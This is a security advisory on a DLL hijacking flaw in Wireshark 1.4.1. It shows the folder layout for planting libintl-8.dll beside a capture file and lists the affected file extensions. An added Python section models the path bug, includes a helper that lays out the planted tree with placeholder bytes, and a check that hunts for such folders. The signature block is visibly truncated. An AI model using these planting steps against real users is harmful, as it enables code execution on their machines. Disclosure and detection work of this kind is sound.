-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
==========================================================================
==========================================================================
Wireshark 1.4.1 (wireshark.exe) dll hijacking reloaded
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
Tested on:
Windows 7 Professional, fully patched
==========================================================================
==========================================================================
DESCRIPTION:
I think this is just a logic flaw: in fact this program is still
vulnerable to dll hijacking. It is enough to create, in the same folder as
one of the files listed below, this folder tree:
"%commonprogramfiles%\microsoft shared\windows live"
(the variable name is taken literally, i.e. the first folder is really
called "%commonprogramfiles%", which shows the path is used unexpanded and
is therefore resolved relative to the folder of the opened file) and then
put our dll into the "windows live" folder.
E.g.
C:\>dir /S test
Volume in drive C has no label.
Volume Serial Number is XXXX-YYYY
Directory of C:\test
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 11:29 <DIR> %commonprogramfiles%
07/10/2010 13:22 8 test.xspf
1 File(s) 8 bytes
Directory of C:\test\%commonprogramfiles%
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 11:29 <DIR> microsoft shared
0 File(s) 0 bytes
Directory of C:\test\%commonprogramfiles%\microsoft shared
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 11:29 <DIR> windows live
0 File(s) 0 bytes
Directory of C:\test\%commonprogramfiles%\microsoft shared\windows live
14/10/2010 11:29 <DIR> .
14/10/2010 11:29 <DIR> ..
14/10/2010 09:36 14,336 libintl-8.dll
1 File(s) 14,336 bytes
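Added example, not shinnai's code and not part of Wireshark: a small model of the
path logic the listing above implies, a helper that lays out the same planted tree
under a capture file's folder, and a hunting check that finds such trees. It assumes
(the advisory does not say so explicitly) that the loader uses the literal string
"%commonprogramfiles%\microsoft shared\windows live" without expanding the variable,
so the path is relative and is resolved against the current directory, i.e. the
folder of the capture file being opened. The environment value and the payload bytes
are constructed stand-ins.

```python
"""Added example, not shinnai's code: model of the unexpanded-path flaw, a
helper that recreates the planted tree from the dir listing, and a hunting
check. Assumption (not stated on the page): the loader builds the DLL path
from the literal "%commonprogramfiles%\\microsoft shared\\windows live",
never expands the token, and resolves the resulting relative path against
the current directory, which is the folder of the opened capture file."""
import ntpath
import os
import tempfile

LITERAL_SUBDIR = r"%commonprogramfiles%\microsoft shared\windows live"
DLL_NAME = "libintl-8.dll"
# Constructed value for the model; a real process reads it from its environment.
WIN_ENV = {"COMMONPROGRAMFILES": r"C:\Program Files\Common Files"}


def expand_win_env(path, env):
    """Expand %VAR% tokens case-insensitively, like ExpandEnvironmentStrings;
    unknown tokens are left untouched."""
    out, i = [], 0
    while i < len(path):
        if path[i] == "%":
            j = path.find("%", i + 1)
            if j > i:
                name = path[i + 1:j].upper()
                if name in env:
                    out.append(env[name])
                    i = j + 1
                    continue
        out.append(path[i])
        i += 1
    return "".join(out)


def resolve_dll_path(cwd, expand):
    """Where the loader ends up looking for libintl-8.dll.
    expand=True  : intended behaviour, an absolute path under Common Files.
    expand=False : the flaw, "%commonprogramfiles%" stays a literal folder
                   name, the path is relative and lands under cwd."""
    subdir = expand_win_env(LITERAL_SUBDIR, WIN_ENV) if expand else LITERAL_SUBDIR
    candidate = ntpath.join(subdir, DLL_NAME)
    if ntpath.isabs(candidate):
        return ntpath.normpath(candidate)
    return ntpath.normpath(ntpath.join(cwd, candidate))


def plant(capture_dir, dll_bytes):
    """Recreate the tree from the dir listing under capture_dir and return the
    planted DLL's path. Host separators are used so this runs anywhere; on
    Windows it produces exactly the layout shown in the advisory."""
    target_dir = os.path.join(capture_dir, *LITERAL_SUBDIR.split("\\"))
    os.makedirs(target_dir, exist_ok=True)
    dll_path = os.path.join(target_dir, DLL_NAME)
    with open(dll_path, "wb") as fh:
        fh.write(dll_bytes)
    return dll_path


def find_planted_dlls(root):
    """Hunt: list DLLs sitting below a directory literally named like an
    environment token (%...%). No legitimate install creates such a folder,
    so a hit next to a capture file is a planted hijack."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        parts = os.path.relpath(dirpath, root).split(os.sep)
        if any(len(p) > 2 and p[0] == "%" and p[-1] == "%" for p in parts):
            hits.extend(os.path.join(dirpath, f) for f in filenames
                        if f.lower().endswith(".dll"))
    return sorted(hits)


def demo():
    """Plant into a scratch folder, hunt it, and check a clean folder holding
    the same DLL name is not flagged. Returns the facts worth asserting on."""
    with tempfile.TemporaryDirectory() as scratch:
        capture_dir = os.path.join(scratch, "test")  # stands in for C:\test
        os.makedirs(capture_dir)
        # Constructed stand-in payload; a real hijack DLL only needs a DllMain.
        planted = plant(capture_dir, b"MZ constructed placeholder, not a PE file")
        clean_dir = os.path.join(scratch, "clean")
        os.makedirs(clean_dir)
        with open(os.path.join(clean_dir, DLL_NAME), "wb") as fh:
            fh.write(b"MZ")
        return {
            "planted_exists": os.path.isfile(planted),
            "planted_name": os.path.basename(planted),
            "hit_is_planted": find_planted_dlls(capture_dir) == [planted],
            "clean_hits": find_planted_dlls(clean_dir),
        }


if __name__ == "__main__":
    print("intended:", resolve_dll_path(r"C:\test", expand=True))
    print("flawed  :", resolve_dll_path(r"C:\test", expand=False))
    print(demo())
```

resolve_dll_path shows the two outcomes side by side: with the token expanded the
lookup stays under C:\Program Files\Common Files, without it the same string becomes
a folder under the capture file's directory, which is why the listing above works.
find_planted_dlls is the check a responder can run over user-writable folders; a
folder whose name is a literal %TOKEN% never appears in a clean install.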
==========================================================================
==========================================================================
INFO:
Prg.: wireshark.exe
Ver.: 1.4.1.34476
Ext.: 5vw
acp
apc
atc
bfr
cap
enc
erf
fdc
pcapng
pcap
pkt
rf5
snoop
syc
tpc
tr1
trace
trc
wpc
wpz
dll: libintl-8.dll
==========================================================================
==========================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
=AjRX
-----END PGP SIGNATURE-----